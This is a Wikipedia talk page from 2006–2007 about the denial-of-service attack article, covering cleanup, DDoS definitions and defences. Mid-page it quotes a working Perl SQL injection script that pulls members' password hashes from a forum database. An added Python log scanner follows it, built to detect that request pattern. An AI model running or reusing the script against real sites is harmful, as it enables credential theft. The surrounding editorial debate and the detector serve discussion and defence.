Talk:Denial-of-service attack

From Wikipedia, the free encyclopedia

Protected on 2006 April 18

Reason: Vulgarisms or nonsense were continuously added from different IPs to the article, or large portions removed. --Boborok 07:43, 18 April 2006 (UTC)

Cleanup

Bleh, I'm just going to start cleaning up this article starting at the top. It's going to be rough at first because I'm going to be more concentrated on changing the overall layout. Does anyone have any objections to removing the stuff that reads like an ad? Otherwise I'll do away with it and just pick out key points to be integrated into other sections. fintler 15:45, 23 June 2006 (UTC)

Rewrote DDoS bit

Added some references; I was bored.

Removed some of the stuff in the prevention and response section; it was just leading up to the advertising that has previously been removed. Some of it was broad generalisations with no references backing it up, and some of it was factually wrong. This article needs some attention ;-)

It would be interesting to hear from the original author of the prevention and response section.

218.145.101.210 deleted most of the prevention bit so I reverted to revert by Omicronpersei8. 60.240.174.85 12:28, 24 July 2006 (UTC)

Discussion Points

I'm merging all of the old discussion (some going back to 2003-2004) and putting the points here so they can be discussed easier:

  1. Perhaps some mention should be given to the architecture of the internet responsible for unwanted outcomes by too-many-requests to begin with. Other network protocols exist which benefit rather than degrade with increased scaling of requests. Freenet is one example.
  2. The similarity with slashdotting.
  3. "A final option, one which might be available to larger companies and networks, is to throw more hardware or bandwidth at the flood and wait it out."
  4. "A distributed reflector denial of service is an internet attack of a type first detected in 2005 ..." What? You are about 4 years late. Check that and correct it please.
  5. Mention of operating system/kernel-level defences
  6. Removing the ad-like content towards the bottom along with related ads —The preceding unsigned comment was added by Fintler (talkcontribs).

New category 'Computer Network Security'

I propose to create a new category 'Computer Network Security' assign the same to this article along with many other related articles. Raanoo 06:51, 31 July 2006 (UTC)

There is already such a category, Category:Computer network security. This article's category, Category:Denial-of-service attacks, is in that category. It is a good idea for someone to go through the related article list as suggested to ensure that any articles that properly belong in this category or one of its subs are placed there. JonHarder 13:28, 31 July 2006 (UTC)

DDoS section inaccuracies

A quick read of this article, and I can already see that it needs a lot of help. I will rewrite the next section to be a) correct b) readable.

A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system usually a web server(s). These systems are compromised by attackers using a variety of methods.

A few notes on this:

  1. "...when multiple compromised systems..." - The systems do not have to be compromised. DDoS attacks are just as commonly from groups of willing users who don't realise they aren't anonymous (i.e. script kiddies).
  2. "...usually a web server(s)..." - DDoS attacks affect clients just as (if not more) often than webservers. (see IRC_floods) This is a big reason why some like to use tor, to hide their IP from being DDoSed.
  3. Webserver DDoSes may actually be the Slashdot effect, but misdiagnosed. Client DDoSes are more of an IRC thing, but remember that the internet is not just WWW.
  4. Would we consider a crapflood a DDoS?

Happy editing to all. Michael Billington (talkcontribs) 11:28, 6 August 2006 (UTC)

injection is DoS?

Should the === MySQL injection === section be in this article? Although SQL injection can cause a DoS condition, it is not a DoS attack in itself, is it? If it is considered a DoS attack, should the code be a little bit more illustrative? It simply displays a general SQL injection, not an SQL injection that causes a DoS condition.

Overall I feel the section with source code is confusing.

fv. —The preceding unsigned comment was added by Fedevela (talk • contribs) 17:24, 15 August 2006 (UTC).

It's OK by me to remove the section. The code portion isn't appropriate for an article. See WP:NOT an instruction manual. JonHarder 17:33, 15 August 2006 (UTC)

I will see if instead of completely removing the entry, I draft a DoS attack through an SQL injection. Will post it as soon as it is presentable. I'm excited on my first Wikipedia contribution!!! Thanks for your reply Jon. Fedevela 20:09, 15 August 2006 (UTC)

Sounds good & welcome to Wikipedia! JonHarder 20:35, 15 August 2006 (UTC)


Putting the old section here for now.

MySQL injection

MySQL is a free databasing language and program used in most forums to organize various rows and manage the site's sub-server. A MySQL Injection is malformed MySQL code that affects the targeted database in varying ways. Due to safety reasons, the method of applying a MySQL Injection will be withheld. A written example of an injection is as follows:


#!perl
#Greetz or begining message of the 404 would go here.
use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
$topic = $ARGV[2];
$id = $ARGV[3];
if (@ARGV < 4) {
 print "---------------------------------------------------------\n";
 print "-- This is a MySQL Injection --\n";
 print "-- Coded by Some Hacker --\n";
 print "-- I am a n00b Hacker --\n";
 print "-- Usage: $0 [host] [path] [topic] [id] --\n";
 print "-- Ex: $0 127.0.0.1 cws 2 2 --\n";
 print "---------------------------------------------------------\n";
 exit();
}
$sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a connection\n";
print $sock "GET /$path/index.php?page=forum&func=post&par=$topic HTTP/1.1\n";
print $sock "User-Agent: Mozilla/4.0\n";
print $sock "Host: $host\n\n";
while ($asd = <$sock>) {
        if ($asd =~ /Set-Cookie:/gi) {
            $asd =~ /cuser_id=([a-zA-Z0-9]{32})/;
            $cookie = $1;
        }
}
$sock->close;
$socket = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a connection\n";
print "-- Connection Established --\n";
print $socket "GET   /$path/index.php?page=forum&func=post&par=$topic%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=$id/*  HTTP/1.0\n";
print $socket "User-Agent: Mozilla/4.0\n";
print $socket "Host: $host\n";
print $socket "Cookie: cuser_id=$cookie; chitcounter=hitcounter\n\n";
print "-- Waiting... --\n";
while($ans = <$socket>) {
       if ($ans =~ /([a-zA-Z0-9]{32})/){
            if ($ans =~ /cookie/i) {
                 next;
            }
            print "\nmember id: $id \n";
            print "md5 hash: $1 \n";
            exit;
       }
}

Coded By: Derek H.

Fedevela 11:26, 16 August 2006 (UTC)
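As an added defensive counterpart to the script quoted above (this is not part of the original post, the old article section, or any project's code): a small access-log scanner that flags the query-string shape that script sends, a parameter value carrying UNION SELECT and a trailing comment, over constructed Apache-style log lines. The log lines, IPs and timestamps are made up for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format). The second line
# mirrors the "par=<id> UNION SELECT ... FROM cws_members ... /*" request shape
# of the Perl script above; the others are ordinary forum requests.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Aug/2006:11:26:01 +0000] "GET /cws/index.php?page=forum&func=post&par=2 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [16/Aug/2006:11:26:03 +0000] "GET /cws/index.php?page=forum&func=post&par=2%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=2/* HTTP/1.0" 200 812 "-" "Mozilla/4.0"
198.51.100.9 - - [16/Aug/2006:11:27:15 +0000] "GET /cws/index.php?page=forum&func=view&par=17 HTTP/1.1" 200 4301 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})')

# Indicators of a UNION-based injection attempt inside a single query-string value.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("trailing_comment", re.compile(r"(?:/\*|--|#)\s*$")),
    ("sql_keyword", re.compile(r"\b(?:from|where)\b", re.I)),
]

def scan_target(target):
    """Return (param, indicator) hits for one request target, e.g. '/x.php?a=1'."""
    hits = []
    query = urlsplit(target).query          # parse_qs percent-decodes each value once
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote_plus(value)   # decode a second time to catch double-encoding
            for label, pattern in INDICATORS:
                if pattern.search(decoded):
                    hits.append((name, label))
    return hits

def scan_log(text):
    """Return (ip, params, indicators) for each log line whose query carries SQLi indicators."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                        # skip lines that are not in combined format
        hits = scan_target(m.group("target"))
        if hits:
            params = sorted({p for p, _ in hits})
            labels = sorted({l for _, l in hits})
            findings.append((m.group("ip"), params, labels))
    return findings

if __name__ == "__main__":
    for ip, params, labels in scan_log(SAMPLE_LOG):
        print(f"{ip}: suspicious value in {params} ({', '.join(labels)})")
```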


OK! Finished editing that section ... I have not tested the code, and I am not positive you can insert EL expressions in the SQL tag like I'm doing. Nevertheless I think this sample illustrates the relationship between DoS and SQL injection. Please let me know what you think! Fedevela 14:30, 16 August 2006 (UTC)

Should there be code offered here?

Given the extremely slow performance of Wikipedia navigation and page refreshes at certain times (earlier this afternoon, for example) while other sites respond normally, my non-technical suspicious mind wonders if there's a denial of service attack going on. I don't have the background to understand the code posted above, but based on the comments surrounding it I have to wonder if it's a good idea to allow such code examples anywhere at Wikipedia. --CliffC 21:24, 9 October 2006 (UTC)

*smirks*

The person who hacked the box is NOT eligible, nor are members of the Honeynet Project. Members of the Honeynet Research Alliance or companies employing Honeynet Project members are eligible (and encouraged!) to enter, but their entries (even if Top 20) will not receive copies of Know Your Enemy. The books go to other entrants.

From the Honeywell Project page. No particular relevance to this article; just thought it was amusing. :p --Veratien 01:03, 2 December 2006 (UTC)

Client Puzzle Protocol

- has been proposed as a solution to DoS. Maybe we should mention this? —The preceding unsigned comment was added by Cdamama (talkcontribs) 03:05, 13 December 2006 (UTC).

Looks completely useless to me. Most DoS attacks do not require a complete connection to be made, so any sort of "puzzle protocol" can't even be started. Wrs1864 03:11, 13 December 2006 (UTC)

Effects

If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice.

No. "Accidentally breaking the internet" is not why ISPs ban DoS attacks. ISPs ban DoS attacks because they intentionally break the internet. (See TOS §3.1.1 Breaking the Internets)

Removed second sentence. —Ryan 06:54, 6 March 2007 (UTC)